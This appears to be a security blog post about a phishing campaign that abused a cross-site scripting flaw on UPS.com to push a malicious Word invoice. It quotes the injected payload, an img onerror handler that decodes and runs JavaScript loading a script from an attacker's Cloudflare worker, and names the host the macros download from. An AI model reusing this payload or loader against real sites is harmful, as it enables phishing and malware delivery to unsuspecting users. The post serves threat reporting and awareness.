UPS XSS Vulnerability Used in Sophisticated Phishing Attacks

Recent reports have indicated fraudsters leveraging a XSS vulnerabilities on UPS.com to issue fake UP Invoice Microsoft Word docs. UPS, for the very few who are not familiar, is the United Parcel Service and a popular American shipping and receiving, supply-chain management company.


Researcher Daniel Gallagher first encountered the scam pretending to be an email from UPS claiming that a package had an "exception" and needed to be picked up by the customer. The threat actor uses a XSS vulnerability in UPS.com to modify the regular look of the website to make it appear like a legit download page. This vulnerability allows the fraudster to push a malicious doc through a remote Cloudflare worker but it comes it looking like it came from UPS.com.


The email, itself, contains multiple legitimate links that likely serve only to legitimize the email. The tracking number, however, is a link to the UPS site that contains the exploit for an XSS vulnerability that will inject JavaScript into the browser once the page is opened.



The phishing URL:


The base64 encoded string seen in the middle of this URL contains a comment from the fraudster, essentially explaining that the URL needed to be longer in order to hide the XSS exploit query parameter at the end. It translates to the following:

1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;)


The comment could be a nod to security researchers that the fraudster accurately predicted would analyze the phishing URL.


The second string contains the JavaScript exploit injected into UPS.com when a user accesses the page:

img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

The base64 string in the atob() function contains the URL mentioned to a Cloudflare worker script the vulnerability loads up:

$.getScript('https://m.media-amazon.workers.dev/js')

Discovered by Gallagher on Urlscan, the Cloudflare worker script will make the UPS page display a message that a file is downloading:


This page is ultimately where the malicious document is downloaded to the victim's machine.


The document downloaded is titled "invoice_1Z7301XR1412220178" and appears to be a shipping invoice from UPS. once opened, the document will be unreadable and will prompt the user to "Enable Content" to view it. Once enabled, the macros embedded into the file will download a "blackhole.png" file from "https://divine-bar-3d75.visual-candy.workers.dev".


The phishing attack is of obvious sophistication and creativity. The threat actor removes a great deal of suspicion from the entire process by leveraging the legitimate UPS.com website and a properly obfuscated and hidden URL. While this type of activity may seem obvious to security professionals and researchers, that's not who this is targeting and Joe Schmo in logistics may see this email as completely legitimate.

This is a proper example of sophisticated phishing.

Relevant articles:
https://cisomag.eccouncil.org/xss-vulnerability-in-ups/
https://www.bleepingcomputer.com/news/security/phishing-campaign-uses-upscom-xss-vuln-to-distribute-malware/


Comments

Popular posts from this blog

Russian GRU Unit 29155 recent operations